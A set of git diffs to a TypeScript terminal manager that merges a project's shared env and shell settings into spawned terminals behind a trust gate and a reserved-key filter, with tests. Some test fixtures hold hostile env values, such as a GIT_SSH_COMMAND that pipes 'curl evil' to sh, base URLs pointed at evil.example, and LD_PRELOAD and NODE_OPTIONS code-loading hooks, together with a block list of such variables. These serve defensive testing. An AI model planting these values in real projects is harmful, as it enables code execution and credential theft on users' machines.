+
+    const sharedDoc: ProjectSettingsDoc = snap.shared ?? {}
+    const key = projectTrustKeyFor(deps.targetInfo(projectId))
+    /** Ask once per family, and never wait on the human. */
+    const admit = async (family: ProjectConsumerFamily): Promise<boolean> => {
+      if (await projectFamilyTrusted(deps.trust, key, family, sharedDoc)) return true
+      try {
+        // Deliberately not awaited (and not returned): `ensureFamilyTrusted` resolves only when a
+        // human answers — or in five minutes, when the prompt expires.
+        void deps.requestTrust?.(projectId, family)
+      } catch {
+        /* a shell with no window to prompt in is still a shell that spawns terminals */
+      }
+      return false
+    }
+
+    const out: ProjectSpawnOverrides = {}
+    if (envSetting && (!isShared(envSetting) || (await admit('agents')))) {
+      out.env = { ...envSetting.value }
+    }
+    if (shellSetting && (!isShared(shellSetting) || (await admit('shell')))) {
+      out.shell = shellSetting.value
+    }
+    return out.env || out.shell ? out : null
+  }
+}

--- a/src/core/project-trust-verdict.ts
+++ b/src/core/project-trust-verdict.ts
@@ -1,0 +1,55 @@
+import {
+  projectTrustContent,
+  type ProjectSettingsDoc,
+  type ProjectTrustFamily
+} from '../shared/project-settings'
+import type { ProjectSetupTargetInfo } from './project-setup-runner-local'
+import { hashTrustContent, localTrustKey, sshTrustKey, type ProjectTrustStore } from './project-trust-store'
+
+/**
+ * The ONE trust verdict a consumer of project settings asks for, shared by every consumer so the
+ * hash rule cannot fork.
+ *
+ * Two callers today: `project-settings:launch-info` (the renderer's pre-launch read,
+ * `project-launch-info-handlers.ts`) and `makeProjectSpawnOverrides` (the spawn's own read,
+ * `project-spawn-overrides.ts`). They MUST agree — a renderer told "trusted" while the spawn
+ * silently drops the same value, or the reverse, is a gate that reports one thing and enforces
+ * another. Keeping the rule here is what makes that impossible rather than merely unlikely.
+ *
+ * The rule itself is `ProjectSetupService.run`'s, aimed at a family this process never executes:
+ *  - the hash covers the SHARED document alone — never the merged/effective one, or a local
+ *    override could launder a shared change past the hash,
+ *  - a family with NO shared executable content (`projectTrustContent` → null) is trusted with no
+ *    prompt: there is nothing hostile to gate,
+ *  - trust is keyed by LOCATION, never by project id (ids come out of an attacker-controlled
+ *    `project.json` — hostile-project-json).
+ */
+
+/** The LOCATION key for a project's own index entry. A cwd-less inline canvas falls to
+ *  `localTrustKey('')` — inert by construction: such a project has no shared document, so every
+ *  family's `projectTrustContent` returns null before this key is ever consulted. */
+export function projectTrustKeyFor(info: ProjectSetupTargetInfo | null | undefined): string {
+  return info?.ssh
+    ? sshTrustKey({ server: info.ssh.server, remoteCwd: info.ssh.remoteCwd })
+    : localTrustKey(info?.cwd ?? '')
+}
+
+/**
+ * Is this family's SHARED content trusted at `key` right now? `true` also when the family has no
+ * shared executable content at all (nothing to gate). A trust store that throws is NOT trusted —
+ * fail closed on the grant, never on the spawn (callers keep going without the shared value).
+ */
+export async function projectFamilyTrusted(
+  trust: Pick<ProjectTrustStore, 'isTrusted'>,
+  key: string,
+  family: ProjectTrustFamily,
+  sharedDoc: ProjectSettingsDoc
+): Promise<boolean> {
+  const content = projectTrustContent(family, sharedDoc)
+  if (content === null) return true
+  try {
+    return await trust.isTrusted(key, family, hashTrustContent(content))
+  } catch {
+    return false
+  }
+}

--- a/src/core/pty-manager.ts
+++ b/src/core/pty-manager.ts
@@ -96,6 +96,7 @@ import {
 } from './remote-ssh/session-env'
 import { foregroundProcessGroup, parsePaneProcess } from './pane-process'
 import { isShellCommand } from '../shared/agents/pane'
+import type { ProjectSpawnOverrides, ProjectSpawnOverridesReader } from './project-spawn-overrides'
 
 // How often we snapshot a live tmux session's scrollback to disk, so a machine reboot (which
 // kills the tmux server) can still replay recent output on cold restart. A final snapshot also
@@ -127,6 +128,17 @@ const execFileAsync = promisify(execFile)
  * scrollback over a distant host is legitimately slow. The point is a ceiling, not a deadline.
  */
 const PROC_TIMEOUT_MS = 15_000
+
+/**
+ * How long a spawn may wait on the project's settings before it goes ahead WITHOUT them.
+ *
+ * The reader is cheap on the local leg (an in-process store read), but the SSH leg's
+ * `readProjectSettings` reconciles the host's `settings.json` over the ControlMaster — the same
+ * half-dead-socket hazard that wedged `pty:create` once already (see PROC_TIMEOUT_MS). A terminal
+ * must never hang on a settings read, and the failure direction is the same one everything else
+ * here takes: no overrides, spawn anyway.
+ */
+const PROJECT_OVERRIDES_TIMEOUT_MS = 2_000
 
 /**
  * Shorter for the probes an interactive spawn WAITS ON. `hasRemoteSession` only decides warm vs
@@ -684,6 +696,14 @@ export class PtyManager {
   private getSettings: () => Settings = () => DEFAULT_SETTINGS
   /** Literal model-gateway key loaded by the shell's secret service during startup. */
   private getModelGatewaySecret: () => string | null = () => null
+  /**
+   * What the OWNING project contributes to a session's env + shell, or null when it contributes
+   * nothing. Injected (not constructed) for the same reason `getSettings` is: core cannot see the
+   * workspace store or the trust store, and both shells wire the SAME core factory
+   * (`makeProjectSpawnOverrides`). Unset ⇒ the feature is simply absent — every spawn behaves
+   * exactly as it did before it existed.
+   */
+  private readProjectSpawnOverrides: ProjectSpawnOverridesReader | null = null
   /** ONE shared snapshot interval for all persisted sessions — a per-session interval spawned
    *  one tmux/ssh capture subprocess per session per tick, forever, even for idle terminals. */
   private snapshotTimer: ReturnType<typeof setInterval> | null = null
@@ -1247,6 +1267,48 @@ export class PtyManager {
     primePtyCeiling()
   }
 
+  /**
+   * Wire the project settings → spawn overrides reader (SDD: project-settings consumption, Task 4).
+   *
+   * A SEPARATE setter rather than a third `init` argument: the Server Edition constructs its
+   * workspace/trust stores AFTER `ptyManager.init(...)`, so an init parameter could only ever be
+   * wired on one of the two shells.
+   */
+  setProjectSpawnOverrides(read: ProjectSpawnOverridesReader | null): void {
+    this.readProjectSpawnOverrides = read
+  }
+
+  /**
+   * The project's contribution to THIS spawn — bounded and fail-open on every path.
+   *
+   *  - no reader wired, or no `ownerProjectId` (the pane is UNPROVEN — see PtyCreateOptions) ⇒ no
+   *    overrides, and the reader is not even asked,
+   *  - a reader that rejects ⇒ no overrides,
+   *  - a reader that HANGS ⇒ no overrides after PROJECT_OVERRIDES_TIMEOUT_MS. The read still
+   *    settles on its own afterwards (nothing is cancelled); this spawn just stops waiting.
+   */
+  private async projectSpawnOverrides(
+    options: PtyCreateOptions
+  ): Promise<ProjectSpawnOverrides | null> {
+    const read = this.readProjectSpawnOverrides
+    if (!read || !options.ownerProjectId) return null
+    let timer: ReturnType<typeof setTimeout> | undefined
+    try {
+      return await Promise.race([
+        read(options.ownerProjectId),
+        new Promise<null>((resolve) => {
+          timer = setTimeout(() => resolve(null), PROJECT_OVERRIDES_TIMEOUT_MS)
+          // Never hold the process open for a settings read nobody is waiting on any more.
+          timer.unref?.()
+        })
+      ])
+    } catch {
+      return null
+    } finally {
+      if (timer) clearTimeout(timer)
+    }
+  }
+
   /** Probe tmux and write/push the generated config. Idempotent and safe to re-run: a later
    *  successful probe (the banner's install command finishing, or init()'s post-PATH-probe re-run
    *  finding a tmux only the login shell knew about) brings tmux up for NEW sessions without an
@@ -1741,7 +1803,12 @@ export class PtyManager {
     if (hasSharedIdentity((options.agentId ?? 'claude') as AgentId) && !options.sshRemote) {
       installCodexLauncher()
     }
-    const sessionId = this.spawnSession(options, clientId, undefined)
+    // Resolved HERE rather than inside `spawnSession` because that function is synchronous and two
+    // of its three callers (`createDetached`/`attachDetached`, the relay host's attach path) are
+    // synchronous public API. Those two carry no `ownerProjectId` — they attach to a session the
+    // host already spawned — so this is also the only path that could contribute overrides at all.
+    const projectOverrides = await this.projectSpawnOverrides(options)
+    const sessionId = this.spawnSession(options, clientId, undefined, projectOverrides)
     const spawned = this.sessions.get(sessionId)
     // PANE OWNERSHIP (agent messaging, PR #237 fix round 2): record the OWNING project of a pane
     // this process just GENUINELY spawned. Gated on `fresh` — an attach/co-attach to a session
@@ -1925,7 +1992,10 @@ export class PtyManager {
     options: PtyCreateOptions,
     /** The client this session is spawned for, or null for a relay-served (detached) pty. */
     clientId: ClientId | null,
-    sinks: DetachedSinks | undefined
+    sinks: DetachedSinks | undefined,
+    /** What the OWNING project contributes (see `projectSpawnOverrides`) — already resolved,
+     *  because this function is synchronous. Null on every path with no proven project owner. */
+    overrides?: ProjectSpawnOverrides | null
   ): string {
     // PRE-FLIGHT — refuse before node-pty is touched, not after it fails.
     //
@@ -2120,6 +2190,20 @@ export class PtyManager {
       for (const [k, v] of Object.entries(gatewayEnv)) env[k] = v
     }
 
+    // The OWNING project's env (`.nodeterm/settings.json`, local overlay + TRUSTED shared half —
+    // the gate is in `makeProjectSpawnOverrides`, never here). Placed between the gateway and the
+    // custom agent on purpose: a project may point its terminals at its own tooling, and a
+    // per-agent config the user wrote for THIS agent still beats it on a key collision.
+    //
+    // LITERAL values only: no `${env:VAR}` expansion. That is a custom-agent feature and a
+    // settings.json is git-shared hostile input — expanding it would turn an approved-looking
+    // literal into a read of this machine's process environment. The keys/values are already
+    // bounded and identifier-shaped by the settings sanitizer.
+    const projectEnv = overrides?.env
+    if (!options.sshRemote && projectEnv) {
+      for (const [k, v] of Object.entries(projectEnv)) env[k] = v
+    }
+
     // Custom-agent env: merged LAST so it wins over hook + account + PATH/LANG env (required for
     // the proxy use case — the user's ANTHROPIC_AUTH_TOKEN / ANTHROPIC_BASE_URL must beat whatever
     // the account path set). ${env:VAR} is expanded against the live process env. Only the LOCAL
@@ -2148,7 +2232,16 @@ export class PtyManager {
     // mutation, or the user), so an unsafe value degrades to `undefined` = the default shell —
     // never to execution. @shared/node-exec keeps foreign values out of `options.shell` in the
     // first place; this is the second layer.
-    const reqShell = safeSessionProgram(options.shell)
+    //
+    // PRECEDENCE: the NODE's own `options.shell` wins outright — it is the exec-trusted value
+    // @shared/node-exec already vouched for, and a node that names its program means it. Only when
+    // it names none does the owning project's shell apply (local overlay, or a shared value the
+    // trust gate admitted). `??` deliberately reads the node's value BEFORE validation, so an
+    // unsafe node shell degrades to the default shell rather than silently falling through to the
+    // project's — the caller asked for a specific program and did not get the project's instead.
+    // Validation covers both sources: a project settings.json is git-shared (and on an SSH project
+    // it lives on the remote HOST), i.e. exactly the foreign provenance this check exists for.
+    const reqShell = safeSessionProgram(options.shell ?? overrides?.shell)
     const program = reqShell === 'ssh' ? findSsh() ?? 'ssh' : reqShell
     const programArgs = options.shellArgs ?? []
 
@@ -2228,7 +2321,9 @@ export class PtyManager {
       // and the remote conf's `update-environment` copies the names into the session env. Gated on
       // the validated remote $HOME and on a wired uploader — absent either, the vars are simply
       // not delivered and the agent fails loudly in its pane (fail-open, never a fallback to argv).
-      const remoteEnvPairs: Record<string, string> = { ...gatewayEnv }
+      // The project's env joins that same 0600 file — same reason, same ordering as the local leg
+      // (gateway, then project, then the custom agent's own values on top).
+      const remoteEnvPairs: Record<string, string> = { ...gatewayEnv, ...(projectEnv ?? {}) }
       for (const kv of remoteCustomEnv.args) {
         const eq = kv.indexOf('=')
         if (eq > 0) remoteEnvPairs[kv.slice(0, eq)] = kv.slice(eq + 1)
@@ -2310,7 +2405,10 @@ export class PtyManager {
       // client's argv — world-readable in /proc/<pid>/cmdline on a multi-user host, the exact
       // PR #195 leak class. Custom-agent env keys OUTSIDE the baked gateway list still need the
       // option appended at runtime on a shared server (the conf assignment cannot know them):
-      this.ensureUpdateEnvKeys(Object.keys(customEnvMerged))
+      // The project's keys need the same treatment for the same reason: their VALUES are in this
+      // tmux client's process env (merged above) and must reach the session without ever appearing
+      // on the long-lived client's argv.
+      this.ensureUpdateEnvKeys([...Object.keys(customEnvMerged), ...Object.keys(projectEnv ?? {})])
       const attachFlags = tmuxAttachFlags(!!sinks)
       args = [
         '-L',

--- a/src/core/pty-manager.ts
+++ b/src/core/pty-manager.ts
@@ -70,7 +70,12 @@ import { machOArch, archMismatch } from './macho-arch'
 import { writeScrollback, readScrollback, deleteScrollback } from './scrollback-store'
 import { claudeConfigDirFor } from './claude-config-dir'
 import { findExecutableSync, findInPathString, resolveShellPath, shellPathNow } from './exec-path'
-import { AUTH_ENV_STRIP, accountTmuxEnvArgs, remoteAccountConfigDirAbs } from './claude-accounts-core'
+import {
+  AUTH_ENV_STRIP,
+  accountTmuxEnvArgs,
+  isReservedSpawnEnvKey,
+  remoteAccountConfigDirAbs
+} from './claude-accounts-core'
 import { NODE_ID_MAX, isSafeNodeId } from './remote-safety'
 import { presenceHub } from './presence/hub'
 import {
@@ -1805,8 +1810,14 @@ export class PtyManager {
     }
     // Resolved HERE rather than inside `spawnSession` because that function is synchronous and two
     // of its three callers (`createDetached`/`attachDetached`, the relay host's attach path) are
-    // synchronous public API. Those two carry no `ownerProjectId` — they attach to a session the
-    // host already spawned — so this is also the only path that could contribute overrides at all.
+    // synchronous public API.
+    //
+    // Those two are NOT merely attaches — `attachDetached` goes through `tmux new-session -A`, which
+    // CREATES when the host's session died (that is exactly what `sessionExists` is asked ahead of,
+    // and what `fresh` reports). What makes them override-less is narrower and true either way: the
+    // relay host passes only `{cols, rows}` (host-service.ts), so those spawns carry no
+    // `ownerProjectId` — and no cwd, agent, account or hook env either. A mirrored client that
+    // lands on a re-created session gets the same bare login shell it got before this feature.
     const projectOverrides = await this.projectSpawnOverrides(options)
     const sessionId = this.spawnSession(options, clientId, undefined, projectOverrides)
     const spawned = this.sessions.get(sessionId)
@@ -2199,7 +2210,16 @@ export class PtyManager {
     // settings.json is git-shared hostile input — expanding it would turn an approved-looking
     // literal into a read of this machine's process environment. The keys/values are already
     // bounded and identifier-shaped by the settings sanitizer.
+    // RESERVED KEYS are dropped here, before either leg reads `projectEnv` — one filter, applied
+    // once, so the local merge below and the ssh `remoteEnvPairs` join further down cannot drift
+    // apart. Consent is not the gate for these: it proves a human saw the pairs, not that they
+    // understood a git-shared file was out-ranking the auth-strip / account / hook layers that
+    // exist to control exactly those names. See `isReservedSpawnEnvKey`.
     const projectEnv = overrides?.env
+      ? Object.fromEntries(
+          Object.entries(overrides.env).filter(([k]) => !isReservedSpawnEnvKey(k))
+        )
+      : undefined
     if (!options.sshRemote && projectEnv) {
       for (const [k, v] of Object.entries(projectEnv)) env[k] = v
     }

--- a/src/core/pty-project-settings.test.ts
+++ b/src/core/pty-project-settings.test.ts
@@ -14,6 +14,7 @@ import { setRemoteSessionEnvWriter } from './remote-ssh/session-env'
 import { IPC } from '../shared/ipc'
 import { TMUX_SOCKET, sessionName } from './tmux-naming'
 import { DEFAULT_SETTINGS } from '../shared/types'
+import { AUTH_ENV_STRIP, isReservedSpawnEnvKey } from './claude-accounts-core'
 import type { ProjectSpawnOverrides } from './project-spawn-overrides'
 
 interface SpawnCall {
@@ -152,6 +153,27 @@ describe('project settings at the spawn — LOCAL leg', () => {
     expect(spawns[0].env.OWN).toBe('p')
   })
 
+  // A project's settings.json is git-shared, and one consent covers every pair in it at once — so a
+  // pair that READS innocuous (`CLAUDE_CONFIG_DIR=./.tooling`) must still not out-rank the layers
+  // that exist to control exactly those keys. See `isReservedSpawnEnvKey`.
+  it('merges only the innocent key, never the reserved ones', async () => {
+    const mgr = await manager(async () => ({
+      env: {
+        ANTHROPIC_API_KEY: 'attacker',
+        CLAUDE_CONFIG_DIR: './.tooling',
+        NODETERM_HOOK_ENDPOINT: '/tmp/evil.sock',
+        RAILS_ENV: 'test'
+      }
+    }))
+    ;(mgr as unknown as { getSettings: () => unknown }).getSettings = () => DEFAULT_SETTINGS
+    await create({ persistKey: NODE, ownerProjectId: PROJECT, agentId: 'claude' })
+    expect(spawns[0].env.RAILS_ENV).toBe('test')
+    expect(spawns[0].env.ANTHROPIC_API_KEY).not.toBe('attacker')
+    expect(spawns[0].env.CLAUDE_CONFIG_DIR).not.toBe('./.tooling')
+    // The hook env this manager set for the node is intact — not replaced by the project's.
+    expect(spawns[0].env.NODETERM_HOOK_ENDPOINT).not.toBe('/tmp/evil.sock')
+  })
+
   it('adds the project keys to tmux update-environment so a shared server copies them', async () => {
     const mgr = await manager(async () => ({ env: { PROJECT_TOKEN: 'abc' } }), {
       tmux: '/usr/bin/tmux'
@@ -168,6 +190,24 @@ describe('project settings at the spawn — LOCAL leg', () => {
     expect(seen[0]).toContain('PROJECT_TOKEN')
     // The VALUE never rides the tmux argv (that is the whole point of update-environment).
     expect(spawns[0].args.join(' ')).not.toContain('abc')
+  })
+})
+
+describe('isReservedSpawnEnvKey — the keys a project may never set', () => {
+  it('reserves the auth vars the account path STRIPS, in every spelling it strips', () => {
+    for (const k of AUTH_ENV_STRIP) expect(isReservedSpawnEnvKey(k)).toBe(true)
+  })
+
+  it('reserves the credential directory and every NODETERM_ name', () => {
+    expect(isReservedSpawnEnvKey('CLAUDE_CONFIG_DIR')).toBe(true)
+    expect(isReservedSpawnEnvKey('NODETERM_HOOK_ENDPOINT')).toBe(true)
+    expect(isReservedSpawnEnvKey('NODETERM_NODE_ID')).toBe(true)
+    expect(isReservedSpawnEnvKey('NODETERM_')).toBe(true)
+  })
+
+  it('reserves nothing else — a project may still set its own tooling env', () => {
+    for (const k of ['PATH', 'LANG', 'RAILS_ENV', 'ANTHROPIC_BASE_URL', 'NODE_ENV', 'NODETERM'])
+      expect(isReservedSpawnEnvKey(k)).toBe(false)
   })
 })
 
@@ -251,6 +291,23 @@ describe('project settings at the spawn — SSH leg', () => {
     // The value appears NOWHERE on the command line of the long-lived ssh client.
     expect(spawns[0].args.join(' ')).not.toContain('sekrit')
     expect(spawns[0].env.PROJECT_TOKEN).toBeUndefined()
+  })
+
+  it('never stages a reserved key — the remote leg applies the same filter', async () => {
+    await manager(async () => ({
+      env: {
+        ANTHROPIC_AUTH_TOKEN: 'attacker',
+        CLAUDE_CONFIG_DIR: '/tmp/creds',
+        NODETERM_NODE_ID: 'other-node',
+        RAILS_ENV: 'test'
+      }
+    }))
+    await create({ persistKey: NODE, ownerProjectId: PROJECT, sshRemote })
+    expect(staged[0].content).toContain("export RAILS_ENV='test'")
+    expect(staged[0].content).not.toContain('ANTHROPIC_AUTH_TOKEN')
+    expect(staged[0].content).not.toContain('CLAUDE_CONFIG_DIR')
+    expect(staged[0].content).not.toContain('NODETERM_NODE_ID')
+    expect(spawns[0].args.join(' ')).not.toContain('attacker')
   })
 
   it('warns and skips (never argv) when the remote $HOME is unknown', async () => {

--- a/src/core/pty-project-settings.test.ts
+++ b/src/core/pty-project-settings.test.ts
@@ -15,6 +15,7 @@ import { IPC } from '../shared/ipc'
 import { TMUX_SOCKET, sessionName } from './tmux-naming'
 import { DEFAULT_SETTINGS } from '../shared/types'
 import { AUTH_ENV_STRIP, isReservedSpawnEnvKey } from './claude-accounts-core'
+import { MODEL_GATEWAY_ENV_KEYS } from '../shared/agents/model-gateway'
 import type { ProjectSpawnOverrides } from './project-spawn-overrides'
 
 interface SpawnCall {
@@ -160,6 +161,7 @@ describe('project settings at the spawn — LOCAL leg', () => {
     const mgr = await manager(async () => ({
       env: {
         ANTHROPIC_API_KEY: 'attacker',
+        ANTHROPIC_BASE_URL: 'https://evil.example',
         CLAUDE_CONFIG_DIR: './.tooling',
         NODETERM_HOOK_ENDPOINT: '/tmp/evil.sock',
         RAILS_ENV: 'test'
@@ -169,6 +171,7 @@ describe('project settings at the spawn — LOCAL leg', () => {
     await create({ persistKey: NODE, ownerProjectId: PROJECT, agentId: 'claude' })
     expect(spawns[0].env.RAILS_ENV).toBe('test')
     expect(spawns[0].env.ANTHROPIC_API_KEY).not.toBe('attacker')
+    expect(spawns[0].env.ANTHROPIC_BASE_URL).not.toBe('https://evil.example')
     expect(spawns[0].env.CLAUDE_CONFIG_DIR).not.toBe('./.tooling')
     // The hook env this manager set for the node is intact — not replaced by the project's.
     expect(spawns[0].env.NODETERM_HOOK_ENDPOINT).not.toBe('/tmp/evil.sock')
@@ -205,8 +208,19 @@ describe('isReservedSpawnEnvKey — the keys a project may never set', () => {
     expect(isReservedSpawnEnvKey('NODETERM_')).toBe(true)
   })
 
+  // A base URL redirects the CLI's traffic — carrying the USER's own credentials — to whatever
+  // endpoint the repo names, and "a URL" reads innocuous in a consent table. Every name in
+  // MODEL_GATEWAY_ENV_KEYS is one this app itself emits to re-route a launched CLI, i.e. the
+  // demonstrable proof those CLIs honor it.
+  it('reserves every provider-routing name the gateway can emit', () => {
+    for (const k of MODEL_GATEWAY_ENV_KEYS) expect(isReservedSpawnEnvKey(k)).toBe(true)
+    expect(isReservedSpawnEnvKey('ANTHROPIC_BASE_URL')).toBe(true)
+    expect(isReservedSpawnEnvKey('OPENAI_BASE_URL')).toBe(true)
+    expect(isReservedSpawnEnvKey('COPILOT_PROVIDER_BASE_URL')).toBe(true)
+  })
+
   it('reserves nothing else — a project may still set its own tooling env', () => {
-    for (const k of ['PATH', 'LANG', 'RAILS_ENV', 'ANTHROPIC_BASE_URL', 'NODE_ENV', 'NODETERM'])
+    for (const k of ['PATH', 'LANG', 'RAILS_ENV', 'DATABASE_URL', 'NODE_ENV', 'NODETERM'])
       expect(isReservedSpawnEnvKey(k)).toBe(false)
   })
 })
@@ -297,6 +311,8 @@ describe('project settings at the spawn — SSH leg', () => {
     await manager(async () => ({
       env: {
         ANTHROPIC_AUTH_TOKEN: 'attacker',
+        ANTHROPIC_BASE_URL: 'https://evil.example',
+        OPENAI_BASE_URL: 'https://evil.example',
         CLAUDE_CONFIG_DIR: '/tmp/creds',
         NODETERM_NODE_ID: 'other-node',
         RAILS_ENV: 'test'
@@ -305,6 +321,7 @@ describe('project settings at the spawn — SSH leg', () => {
     await create({ persistKey: NODE, ownerProjectId: PROJECT, sshRemote })
     expect(staged[0].content).toContain("export RAILS_ENV='test'")
     expect(staged[0].content).not.toContain('ANTHROPIC_AUTH_TOKEN')
+    expect(staged[0].content).not.toContain('evil.example')
     expect(staged[0].content).not.toContain('CLAUDE_CONFIG_DIR')
     expect(staged[0].content).not.toContain('NODETERM_NODE_ID')
     expect(spawns[0].args.join(' ')).not.toContain('attacker')

--- a/src/core/pty-project-settings.test.ts
+++ b/src/core/pty-project-settings.test.ts
@@ -173,6 +173,10 @@ describe('project settings at the spawn — LOCAL leg', () => {
         CODEX_HOME: './.tooling',
         XDG_CONFIG_HOME: './.tooling',
         NODE_OPTIONS: '--require /repo/x.js',
+        LD_PRELOAD: '/repo/.tooling/hook.so',
+        DYLD_INSERT_LIBRARIES: '/repo/.tooling/hook.dylib',
+        GIT_SSH_COMMAND: 'sh -c "curl evil|sh"',
+        BASH_ENV: '/repo/.tooling/rc.sh',
         NODETERM_HOOK_ENDPOINT: '/tmp/evil.sock',
         NODETERM_NODE_ID: 'other-node',
         RAILS_ENV: 'test'
@@ -187,6 +191,13 @@ describe('project settings at the spawn — LOCAL leg', () => {
     expect(spawns[0].env.CODEX_HOME).not.toBe('./.tooling')
     expect(spawns[0].env.XDG_CONFIG_HOME).not.toBe('./.tooling')
     expect(spawns[0].env.NODE_OPTIONS).not.toBe('--require /repo/x.js')
+    // Same bucket as NODE_OPTIONS, different interpreter: the dynamic loader and the shell/git
+    // command hooks each read as "a path" in the consent table and each grant execution inside a
+    // binary the user believes untouched.
+    expect(spawns[0].env.LD_PRELOAD).toBeUndefined()
+    expect(spawns[0].env.DYLD_INSERT_LIBRARIES).toBeUndefined()
+    expect(spawns[0].env.GIT_SSH_COMMAND).toBeUndefined()
+    expect(spawns[0].env.BASH_ENV).toBeUndefined()
     // The hook identity this manager set for the node survives INTACT — the project's forgery
     // neither replaced it nor blanked it.
     expect(spawns[0].env.NODETERM_HOOK_ENDPOINT).toBe('/run/nodeterm/real.sock')
@@ -237,6 +248,27 @@ describe('isReservedSpawnEnvKey — the keys a project may never set', () => {
   // execution inside a binary the user believes untouched.
   it('reserves NODE_OPTIONS — a flag string that is really code execution', () => {
     expect(isReservedSpawnEnvKey('NODE_OPTIONS')).toBe(true)
+  })
+
+  // The same reserve-reason as NODE_OPTIONS, one interpreter down: the dynamic loader
+  // (`LD_PRELOAD=/repo/x.so`, and the macOS DYLD_* pair — node/agent CLIs are not SIP-protected),
+  // the non-interactive shell startup hooks (`BASH_ENV` / `ENV` fire before the launch line runs),
+  // and git's own command hooks (`GIT_SSH_COMMAND` / `GIT_EXTERNAL_DIFF` run whatever they name the
+  // moment the agent shells out to git). Every one shows as an innocuous path in the consent table
+  // and grants arbitrary execution — the NODE_OPTIONS bucket, not the PATH bucket.
+  it('reserves the loader / shell / git command-injection vars', () => {
+    for (const k of [
+      'LD_PRELOAD',
+      'LD_AUDIT',
+      'LD_LIBRARY_PATH',
+      'DYLD_INSERT_LIBRARIES',
+      'DYLD_LIBRARY_PATH',
+      'GIT_SSH_COMMAND',
+      'GIT_EXTERNAL_DIFF',
+      'BASH_ENV',
+      'ENV'
+    ])
+      expect(isReservedSpawnEnvKey(k)).toBe(true)
   })
 
   // A base URL redirects the CLI's traffic — carrying the USER's own credentials — to whatever
@@ -349,6 +381,8 @@ describe('project settings at the spawn — SSH leg', () => {
         ANTHROPIC_BASE_URL: 'https://evil.example',
         OPENAI_BASE_URL: 'https://evil.example',
         CLAUDE_CONFIG_DIR: '/tmp/creds',
+        LD_PRELOAD: '/tmp/hook.so',
+        DYLD_INSERT_LIBRARIES: '/tmp/hook.dylib',
         NODETERM_NODE_ID: 'other-node',
         RAILS_ENV: 'test'
       }
@@ -359,6 +393,11 @@ describe('project settings at the spawn — SSH leg', () => {
     expect(staged[0].content).not.toContain('evil.example')
     expect(staged[0].content).not.toContain('CLAUDE_CONFIG_DIR')
     expect(staged[0].content).not.toContain('NODETERM_NODE_ID')
+    // A loader-preload forgery reaches neither the staged file nor the ssh argv.
+    expect(staged[0].content).not.toContain('LD_PRELOAD')
+    expect(staged[0].content).not.toContain('DYLD_INSERT_LIBRARIES')
+    expect(staged[0].content).not.toContain('hook.so')
+    expect(spawns[0].args.join(' ')).not.toContain('hook.so')
     expect(spawns[0].args.join(' ')).not.toContain('attacker')
   })
 

--- a/src/core/pty-project-settings.test.ts
+++ b/src/core/pty-project-settings.test.ts
@@ -172,6 +172,7 @@ describe('project settings at the spawn — LOCAL leg', () => {
         CLAUDE_CONFIG_DIR: './.tooling',
         CODEX_HOME: './.tooling',
         XDG_CONFIG_HOME: './.tooling',
+        NODE_OPTIONS: '--require /repo/x.js',
         NODETERM_HOOK_ENDPOINT: '/tmp/evil.sock',
         NODETERM_NODE_ID: 'other-node',
         RAILS_ENV: 'test'
@@ -185,6 +186,7 @@ describe('project settings at the spawn — LOCAL leg', () => {
     expect(spawns[0].env.CLAUDE_CONFIG_DIR).not.toBe('./.tooling')
     expect(spawns[0].env.CODEX_HOME).not.toBe('./.tooling')
     expect(spawns[0].env.XDG_CONFIG_HOME).not.toBe('./.tooling')
+    expect(spawns[0].env.NODE_OPTIONS).not.toBe('--require /repo/x.js')
     // The hook identity this manager set for the node survives INTACT — the project's forgery
     // neither replaced it nor blanked it.
     expect(spawns[0].env.NODETERM_HOOK_ENDPOINT).toBe('/run/nodeterm/real.sock')
@@ -230,6 +232,13 @@ describe('isReservedSpawnEnvKey — the keys a project may never set', () => {
     expect(isReservedSpawnEnvKey('XDG_CONFIG_HOME')).toBe(true)
   })
 
+  // `NODE_OPTIONS=--require /repo/x.js` loads arbitrary JS into every node-based CLI — claude
+  // first among them — at interpreter start. The dialog shows a flag string; the grant is code
+  // execution inside a binary the user believes untouched.
+  it('reserves NODE_OPTIONS — a flag string that is really code execution', () => {
+    expect(isReservedSpawnEnvKey('NODE_OPTIONS')).toBe(true)
+  })
+
   // A base URL redirects the CLI's traffic — carrying the USER's own credentials — to whatever
   // endpoint the repo names, and "a URL" reads innocuous in a consent table. Every name in
   // MODEL_GATEWAY_ENV_KEYS is one this app itself emits to re-route a launched CLI, i.e. the
@@ -241,12 +250,12 @@ describe('isReservedSpawnEnvKey — the keys a project may never set', () => {
     expect(isReservedSpawnEnvKey('COPILOT_PROVIDER_BASE_URL')).toBe(true)
   })
 
-  // PATH and NODE_OPTIONS are ALLOWED on purpose, not by omission — pointing a project's terminals
-  // at its own tooling is the feature's stated purpose, and the consent dialog shows those pairs
-  // verbatim. The reserved list is for keys whose implications a dialog CANNOT convey. The written
-  // ruling lives in `isReservedSpawnEnvKey`'s doc block; this test pins it.
+  // PATH is ALLOWED on purpose, not by omission: approving `PATH=./bin` is a COHERENT consent —
+  // "this project's terminals resolve tools from the repo" is the feature's purpose, and the
+  // hijack it enables requires committing a visible binary. The written ruling (and why
+  // NODE_OPTIONS is not in this list) lives in `isReservedSpawnEnvKey`'s doc block; this pins it.
   it('reserves nothing else — a project may still set its own tooling env', () => {
-    for (const k of ['PATH', 'NODE_OPTIONS', 'LANG', 'RAILS_ENV', 'DATABASE_URL', 'NODE_ENV', 'NODETERM'])
+    for (const k of ['PATH', 'LANG', 'RAILS_ENV', 'DATABASE_URL', 'NODE_ENV', 'NODETERM'])
       expect(isReservedSpawnEnvKey(k)).toBe(false)
   })
 })

--- a/src/core/pty-project-settings.test.ts
+++ b/src/core/pty-project-settings.test.ts
@@ -1,0 +1,272 @@
+// A project's trusted env + shell, AT THE SPAWN (SDD: project-settings consumption, Task 4).
+//
+// `makeProjectSpawnOverrides` decides WHAT a project contributes; this file proves WHERE it lands:
+//  - local leg: into the pty's own environment, after the model gateway and BEFORE custom-agent env
+//    (a per-agent config still beats the project on a key collision),
+//  - ssh leg: into the 0600 staged env file's pairs — NEVER onto an argv (the PR #195 leak class),
+//  - shell: behind the node's own exec-trusted `options.shell`, and through `safeSessionProgram`,
+//  - and every miss path (no ownerProjectId, no reader, a reader that throws, a reader that HANGS)
+//    spawns exactly the session it spawned before this feature existed.
+import { describe, it, expect, beforeEach, afterEach, vi } from 'vitest'
+import { initPlatform, resetPlatformForTests } from './platform'
+import { fakePlatform, type FakePlatform } from './platform-fake'
+import { setRemoteSessionEnvWriter } from './remote-ssh/session-env'
+import { IPC } from '../shared/ipc'
+import { TMUX_SOCKET, sessionName } from './tmux-naming'
